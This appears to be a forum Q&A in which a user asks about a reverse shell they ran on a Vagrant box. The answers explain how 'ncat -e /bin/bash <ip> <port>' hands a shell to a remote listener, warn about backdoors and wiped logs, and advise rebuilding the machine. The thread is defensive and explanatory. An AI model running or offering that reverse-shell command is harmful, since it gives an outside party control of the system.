how does reverse shell behave?
I'm assuming you meant:
ncat -e /bin/bash <ip> <port>
The -e argument launches the /bin/bash command when a connection is established. The command then connects out to the IP and executes bash for the remote user to interact with. The remote user gains whatever privs the launching user has. Once this command has been terminated, then so has the connection. No problem for lasting connection there.
BUT The real question is what that person did on your vagrant box ... He could have set up or installed a backdoor, or something else to have a persistent connection.
You could check the session's history file to see what he did, or rebuild the box if you cannot verify his actions.
Netcat is a basic network tool for reading/writing TCP/UDP connections. In the example you gave, you are telling it to run the program specified by -e across TCP to the remote machine and port number. In that particular instance you were sending a bash shell to his machine, presumably where he had a netcat listener waiting.
Netcat is truly the swiss army knife of networking. You can do so much with it. You can:
- create proxies
- chat
- grab service banners
- port scan
- reverse shell
- bind shell
- use it as a simple web server
- transfer files across the internet
It is an immensely powerful tool.
To answer your question about whether or not he could use it to access your mac: Not it in itself. You had to initiate the reverse shell back to his box. Without you sending the shell, he could never connect. However, after connecting he would have been able to plant a backdoor for persistent access.
An attacker with any skill would have cleaned up his session (and system) logs, so you can't even trust those to tell the truth about what happened. The ONLY truly safe thing you can do is to wipe the box.
There has been a vulnerability reported where an attacker could break out of Virtualbox guest through 3D acceleration and gain access to host OS.
This requires that 3D acceleration is enabled for the guest OS.